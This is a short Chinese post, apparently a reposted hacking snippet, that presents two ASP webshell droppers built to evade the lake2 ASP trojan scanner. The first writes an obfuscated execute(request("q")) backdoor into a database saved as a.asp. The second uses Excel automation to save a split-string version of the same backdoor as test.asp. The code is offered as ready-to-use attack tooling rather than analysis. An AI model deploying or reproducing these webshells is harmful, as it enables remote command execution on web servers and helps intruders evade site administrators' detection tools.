两个非常规ASP木马(可躲过扫描)


            hanxiaolian 为了躲避 lake2 ASP站长管理助手而写.. 一.绕过lake2 Asp木马扫描的小马 复制代码 代码如下: <% set c = CreateObject("ADOX.Catalog") c.create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("a.asp")) set c = Nothing c&Server.MapPath("a.asp") set conn=server.createobject("Adodb.Connection") conn.open connstr conn.execute("create table nomm(nomuma oleobject)") set rs=server.createobject("adodb.recordset") sql="SELECT * FROM nomm" rs.open sql,conn,1,3 rs.addnew rs ("nomuma").appendchunk(chrB(asc("<"))&chrB(asc("%"))&chrB(asc ("e"))&chrB (asc("x"))&chrB(asc("e"))&chrB(asc("c"))&chrB(asc ("u"))&chrB(asc("t"))&chrB(asc ("e"))&chrB(asc("+"))&chrB(asc ("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc ("u"))&chrB(asc ("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("("))&chrB(34) &chrB(asc("q"))&chrB(34)&chrB(asc(")"))&chrB(asc("%"))& chrB(asc(">"))) rs.update rs.close set rs=nothing conn.close set conn=nothing %>  二.xls版asp webshell 复制代码 代码如下: <% Set xlA = Server.CreateObject("Excel.Application") xlA.Visible = False xlA.Workbooks.Add Set xlWorksheet = xlA.Worksheets(1) xlWorksheet.Cells(1,1).Value = "<%ex"&"ec"&"ute(request(""q""))"+chr(37)+">" 'strFile = "d:/test.asp" strFile = Server.MapPath("test.asp") xlWorkSheet.SaveAs strFile xlA.Quit Set xlWorksheet = Nothing Set xlA = Nothing %>